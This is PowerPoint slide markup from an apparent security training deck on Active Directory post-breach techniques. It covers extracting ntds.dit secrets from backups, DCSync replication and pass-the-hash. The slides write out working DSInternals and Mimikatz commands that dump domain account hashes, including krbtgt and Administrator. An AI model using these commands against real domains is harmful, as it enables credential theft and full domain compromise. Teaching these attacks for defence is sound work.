              <a:rPr lang="en-US" sz="4800" spc="-50"/>
              <a:t>Active Directory Threats Landscape</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4800" spc="-50"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3200" spc="-50"/>
              <a:t>Section 2 - Post-breach techniques </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" spc="-50"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du texte 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{605BF8EC-CAC7-4AA4-BD7B-3347A1EF9B38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB74B123-B46C-4C2C-AC76-73A066AC2652}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6675753" y="3967891"/>
            <a:ext cx="5358215" cy="3026634"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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From a backup</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3424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If you can get your hands on a DC’s backup, you own the domain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Backups are often stored locally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are not “in-use” therefore they can be copied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contain the AD database and the SYSTEM hive</a:t>
            </a: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about Install from Media files?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is a way to speed up the promotion of domain controllers by starting with a current database (referred as “seed”) so that the new DC does not have to replicate everything through the network</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These files also contain a copy of the database and of the SYSTEM hive</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle: Folded Corner 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{790FEBDE-5549-4589-958E-84C155AA22DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="274602">
            <a:off x="7270183" y="3627595"/>
            <a:ext cx="874047" cy="480144"/>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000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IFM</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CA" sz="24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559170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DSInternal Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>ADReplAccount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644348"/>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Install-Module -Name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DSInternals</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$key = Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>BootKey</a:t>
            </a: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SystemHivePath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ‘C:\backup\SYSTEM'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ADDBAccount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -All -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DBPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ‘C:\backup\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ntds.dit</a:t>
            </a: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BootKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $key </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ADDBAccount</a:t>
            </a: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DistinguishedName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 'CN=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>krbtgt,CN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Users,DC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>contoso,DC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=com' `</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pP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DBPath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> C:\backup\ntds.dit' -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>BootKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $key</a:t>
            </a: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3443611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dirty="0"/>
              <a:t>Remotely via DSRRPC </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>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62841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Only administrators and domain controllers have the permissions to do it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ACE: Replicate Changes All on the naming context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Other components might also have this permission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Identity synchronization products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Network devices</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41788975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Let’s replicate the secrets!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55789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Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>DSInternals</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="1250">
                    <a:srgbClr val="505050"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="505050"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="0"/>
              </a:gradFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" lvl="2" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" sz="1600">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>ADReplAccount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>SamAccountName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t> Administrator -Domain CONTOSO -Server DC01 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" lvl="2" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="16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err="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="2000">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>lsadump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>dcsync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t> /user Administrator </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8518899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Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>dcsync</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721292"/>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privilege::debug</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lsadump</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dcsync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user:contoso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>administrator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>domain:contoso.com</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"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4866842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DSInternal Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>ADReplAccount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644348"/>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Install-Module -Name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DSInternals</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ADReplAccount</a:t>
            </a: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SamAccountName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Administrator -Domain CONTOSO -Server DC01 </a:t>
            </a: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5666605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2794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 the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>NThash</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Extract the hash from the LSASS memory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requires the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" err="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>seDebugPrivilege</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Requires that the targeted identity has cached its credentials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Inject the hash into your current session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Either locally, or later on other systems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“new” hash is used to calculate NTLM responses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Does not trigger any failed authentication attempts </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF643604-D1DE-4B29-980E-090E268AFBB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2061002" y="5233782"/>
            <a:ext cx="8148560" cy="1272656"/>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800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0179D7"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>This is possible because the hash is in the memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="571500" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Needed for Single Sign-On</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="713059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fr-FR" err="1"/>
              <a:t>PtH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" err="1"/>
              <a:t>toolsets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8623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WCE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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Credentials Editor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Inject a driver to talk to LSASS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" err="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="1250">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="505050"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>Mimikatz</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Accesses the LSASS memory directly </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831006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055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686645" y="1963254"/>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Attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="2917">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="30000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>the database</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The secrets are in the database, so let’s get a hand on it and crack it open!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274702" y="1913353"/>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B81E4180-C85A-4E58-8EB5-72FF17CAF4D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="686645" y="3088899"/>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Attacks based on NTLM</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A fairly old authentication protocol. Let’s see how to leverage the material it caches to steal somebody’s identity. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE6033A6-690D-436B-85DE-17D3F6DEFB70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274702" y="3046414"/>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53929594-3B17-4F60-8FF2-8A6CB5461DAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="686645" y="4239521"/>
            <a:ext cx="3354658"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Attacks based on Kerberos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err="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="2917">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="30000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Kerberos</a:t>
